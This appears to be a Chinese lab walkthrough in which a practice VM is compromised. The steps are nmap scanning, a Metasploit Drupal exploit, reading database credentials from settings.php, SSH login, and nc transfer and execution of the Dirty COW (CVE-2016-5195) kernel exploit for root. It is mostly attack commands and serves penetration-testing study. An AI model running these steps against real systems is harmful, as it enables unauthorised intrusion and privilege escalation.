介绍
漏洞编号 CVE-2016-5195
漏洞名称:脏牛提权
漏洞危害:低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权,获取root权限
影响范围:Linux内核>=2.6.22(2007年发行)开始就受了影响了,直到2016年10月18日才修复
链接: 靶场下载地址,提取码
链接: 提权文件下载地址,提权码zp3j
信息收集
ifconfig
查看本地ip地址
nmap -sP 192.168.152.0/24
扫描网段,查看靶场地址
nmap -A 192.168.152.129 -p 0-65535
扫描端口
打开网络地址http://[ip]:1898,出现此页面表示靶场打开成功
dirb 网站地址
扫描目录
我们使用robots.txt查看是否有可利用漏洞,查看
网站里面是drupal的版本信息,我们使用msfconsole查看是否有可利用漏洞
漏洞复现
Msfconsole
#搜索是否有可利用漏洞
search drupal
#查询漏洞
use 1
#查看序号为1的漏洞
show options
#查看需要设置的内容#使用 set 进行设置
set RHOSTS 靶场地址
set RPSOST 靶场端口
run
#进行运行,发现漏洞
shell
#进行交互
python -c 'import pty; pty.spawn("/bin/bash")'
#利用Python进行交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'
cat settings.php
#查看里面内容
得到数据库的账号和密码
cd /home
#进入/home 目录,查看已存在的账户
ssh连接 账号tiago 密码Virgulino 端口 22 连接成功
id
查看当前用户信息
uname -a
查看靶机的内核版本
脏牛提权
脚本链接: 提权文件下载地址,提权码zp3j
kali tar -czvf aa.tar.gz CVE-2016-5195-master
#对文件进行压缩
压缩后的名称为aa.tar.gz,需要传入靶机中,进行提权
靶机:监听4444端口上的 aa.tar.gz文件
nc -l 4444 > aa.tar.gz
kali 把aa.tar.gz文件传输过去
nc 192.168.152.129 4444 < aa.tar.gz
靶机 对传输过来的aa.tar.gz进行解压tar -xzvf aa.tar.gz
#
进入 CVE-2016-5195-master
cd CVE-2016-5195-master
make
#出现新内容 dcow
./dcow
root密码为
dirtyCowFun
su
输入密码后提权成功